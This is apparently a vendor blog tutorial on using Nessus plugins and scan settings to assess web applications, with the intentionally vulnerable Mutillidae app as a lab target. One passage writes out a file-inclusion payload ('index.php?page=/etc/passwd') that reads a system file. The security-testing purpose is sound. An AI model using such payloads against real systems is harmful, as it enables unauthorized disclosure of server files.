Tips For Using Nessus In Web Application Testing
While Nessus has traditionally been a network vulnerability scanner, it contains quite a bit of functionality that can be used to identify vulnerabilities in custom web applications. This is not to say that Nessus will replace your favorite web application testing tool (or methodology), but it does provide useful information that can be used as the foundation for web application assessments or to indicate that deeper testing is warranted.
As of Nessus v6, Nmap and Nikto integration and importing of Nmap results into Nessus is no longer supported. Customers are encouraged to continue using the native port scanning and web application scanning capabilities built into Nessus.
There are two different approaches when performing web application testing. The first is part of a larger so-called "blind" test, where you are given a range of IP addresses and asked to test the devices and systems within those ranges. The web applications running within this space will usually be tested generically, but they may not specifically test for web vulnerabilities in a general scan. You need to first find and enumerate which web applications are running and then run targeted scans that specifically look for web vulnerabilities. The second form of testing is when you are given the URL, and typically credentials, to the web application and asked to test it specifically. Nessus can help with both of these tasks, and provide valuable information that will help with your testing. Nessus provides some of the first steps to web application testing, such as identifying the web server software and technologies, detecting vulnerabilities in common/popular web application software and rudimentary CGI application testing. This post focuses on using Nessus for network-based testing, and describes several compliance based checks that provide very thorough testing of web application environments, including scanning to test for the OWASP PHP security specifications and Apache CIS Benchmarks.
Selecting a Target
To create a realistic testing environment our target was setup to run "Mutilidae" version 1.2, a PHP application that was written to contain vulnerabilities. Multilidae was written by "Irongeek" and contains vulnerabilities that specifically the OWASP top ten list. It contains many different types of vulnerabilities, including SQL injection, cross-site scripting (XSS) and information disclosures.
When tuning Nessus for web application testing, you can select the plugin families that are relevant to your test. This saves time and makes for a more efficient scan. However, for a more thorough scan, you can leave all plugin families enabled and let Nessus choose the best plugins. For this scan, I have enabled the following plugin families:
- CGI abuses - This plugin family checks for anything that is ‘CGI’ related, unless it is XSS (and only a XSS vulnerability), in which case it falls into the "CGI abuses : XSS" family. These checks use a combination of detection techniques, including checking version of the application and testing for the actual vulnerability. The attacks include software detection, information disclosure, XSS, SQLi, LFI, RFI, overflows and more.
- CGI abuses : XSS - Specific CGI checks for reflective and persistent XSS vulnerabilities in common web applications.
- Database - Typically a web server will run a database that is used by various web applications.
- FTP - Web pages need to be updated, and FTP is a popular protocol used to allow your web developers to send files to the server.
- Gain a Shell Remotely - If you can obtain a shell on the remote web server, testing the application is somewhat moot.
- Gain root remotely - Same thing as above, if you gain root, resolve this problem before the application is tested.
- General - Contains the operating system fingerprinting plugins, including ones that will identify the OS over HTTP. Identifying the underlying operating system is very important for web application testing, as it will determine the syntax of commands sent via injection (command and SQL) attacks.
- Remote file access- Includes checks for specific web server/application vulnerabilities that lead to remote file disclosure.
- Service detection - Contains checks for several different services, including detecting Apache running HTTPS, HTTP CONNECT proxy settings and other services that may host web applications.
- Web servers - Plugins in this family detect approximately 300 specific vulnerabilities in popular web servers, such as Apache, IIS and generic vulnerabilities associated with the HTTP protocol itself.
Configuring the Scan Policy
In the “Advanced” settings tab, go to the "Global variables settings" and enable the following options:
The "Enable CGI scanning" checkbox causes Nessus to search the web server for known CGI applications and associated vulnerabilities. "Enable experimental scripts" allows Nessus to test for vulnerabilities that use new techniques. The "Thorough tests (slow)" expands your testing when it comes to web applications and allows the the plugin to "try harder" on various tests. This enables more exhaustive SQL injection testing, and it will tell more about CGI applications. By default, Nessus will only store and test the last 8 CGI applications found. With thorough testing enabled, Nessus will store and test up to 1024 CGI locations.
Next, select "Web mirroring" from the pull-down menu:
In the "Start page" field, enter the location of the web application that you wish to test. Nessus will detect several different web applications and enumerate common directories on the web server. However, it cannot know about all directory names, so by entering the directory to do web mirroring, we add it to the list of applications that will be tested by the CGI scanner and other plugins.
Next, select "Unknown CGI Argument Input Validation Tests (toturecgis) from the pull-down menu:
Select the check box to send POST requests. This will expand the testing that Nessus can do beyond just GET requests. This is important for web application testing as many vulnerabilities could exist in the web application that are only triggered by sending a POST request. By checking this option, it will increase the amount of time for the scan to complete.
After scanning the web application with the above settings, I noticed several plugin results of interest. The first plugin that was triggered was 26194, "Web Server Uses Plain Text Authentication Forms":
Nessus finds three separate pages that are transmitting fields labeled "password" in clear-text, as the application is not using SSL.
The next plugin is 10662, "Web mirroring" which attempts to mirror the remote web site based on the parameters ("/mutillidea") that we provided:
The web mirroring finds not only additional directories ("/mutillidae/images/"), but several CGI applications as well. In a web application assessment, the tester would use the provided CGI values above to perform manual or automated testing to determine the security posture of the web application. Nessus can perform some of this testing for you with plugin 10672, "Unknown CGI Argument Input Validation Tests (torturecgis)":
The above plugin output identifies a couple of different CGI scripts that have security problems, such as traversals and XSS. Nessus chose to test the "logout" function, which is vulnerable to both XSS and remote file disclosure. By changing the syntax of the request slightly we can change this into a successful attack that reads the "/etc/passwd" file. Below we use the syntax of "index.php?page=/etc/passwd" and successfully execute the attack:
While Nessus is not specifically designed for application scanning, it can be a valuable aid in performing pre-deployment scans before bringing applications online. Nessus is a fast and efficient way to identify which applications are on the network and if they are vulnerable to common exploits. This helps to quickly identify applications that may need rudimentary security fixes before more detailed manual testing is performed. Nessus can automate the process of discovering applications and common software, discovering the versions running and checking to see if they are vulnerable. The CGI scanner does a good job of basic "fuzzing" of the parameters of the discovered CGI applications to uncover attacks such as XSS and remote file disclosure. Again, while Nessus does not replace your web application testing tool, or completely replace your web application testing methodology, it is a valuable tool in the web application assessment process, especially for blind testing of large environments with several web servers and multiple applications.